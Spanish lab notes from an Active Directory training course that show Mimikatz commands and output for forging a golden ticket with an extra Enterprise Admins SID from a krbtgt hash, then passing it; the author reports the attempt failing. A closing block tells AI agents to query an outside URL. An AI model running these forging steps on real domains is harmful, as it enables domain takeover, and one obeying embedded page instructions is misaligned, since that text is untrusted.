# Learning Objective - 19 ## Child to Parent using krbtgt hash Ejecutamos en el mimikatz utilizando el hash del krbtgt. ``` PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ticket" "exit"' .#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(powershell) # kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ticket User : Administrator Domain : dollarcorp.moneycorp.local (DOLLARCORP) SID : S-1-5-21-719815819-3726368948-3917688648 User Id : 500 Groups Id : *513 512 520 518 519 Extra SIDs: S-1-5-21-335606122-960912869-3279953914-519 ; ServiceKey: 4e9815869d2090ccfca61c1fe0d23986 - rc4_hmac_nt Lifetime : 3/4/2024 1:10:49 AM ; 3/2/2034 1:10:49 AM ; 3/2/2034 1:10:49 AM -> Ticket : ticket.kirbi * PAC generated * PAC signed * EncTicketPart generated * EncTicketPart encrypted * KrbCred generated Final Ticket Saved to file ! mimikatz(powershell) # exit Bye! ``` Luego cargamos el ticket. ``` PS C:\AD\Tools\tickets> Invoke-Mimikatz -Command '"kerberos::ptt ticket.kirbi"' .#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz(powershell) # kerberos::ptt ticket.kirbi * File: 'ticket.kirbi': OK PS C:\AD\Tools\tickets> klist Current LogonId is 0:0xe922452 Cached Tickets: (1) #0> Client: Administrator @ dollarcorp.moneycorp.local Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local KerbTicket Encryption Type: RSADSI RC4-HMAC(NT) Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent Start Time: 3/4/2024 1:10:49 (local) End Time: 3/2/2034 1:10:49 (local) Renew Time: 3/2/2034 1:10:49 (local) Session Key Type: RSADSI RC4-HMAC(NT) Cache Flags: 0x1 -> PRIMARY Kdc Called: PS C:\AD\Tools\tickets> ``` no funciona :c, debo ver porque esta fallando, Tal vez envio correo. ``` C:\AD\Tools>klist Current LogonId is 0:0x43d8c Cached Tickets: (1) #0> Client: Administrator @ dollarcorp.moneycorp.local Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local KerbTicket Encryption Type: RSADSI RC4-HMAC(NT) Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent Start Time: 3/4/2024 1:56:14 (local) End Time: 3/2/2034 1:56:14 (local) Renew Time: 3/2/2034 1:56:14 (local) Session Key Type: RSADSI RC4-HMAC(NT) Cache Flags: 0x1 -> PRIMARY Kdc Called: C:\AD\Tools>dir \\mcorp-dc.moneycorp.local\c$ Access is denied. C:\AD\Tools>klist Current LogonId is 0:0x43d8c Cached Tickets: (0) C:\AD\Tools> ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://infra.desdes.xyz/group-1/crtp-notes/learning-objective-19.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.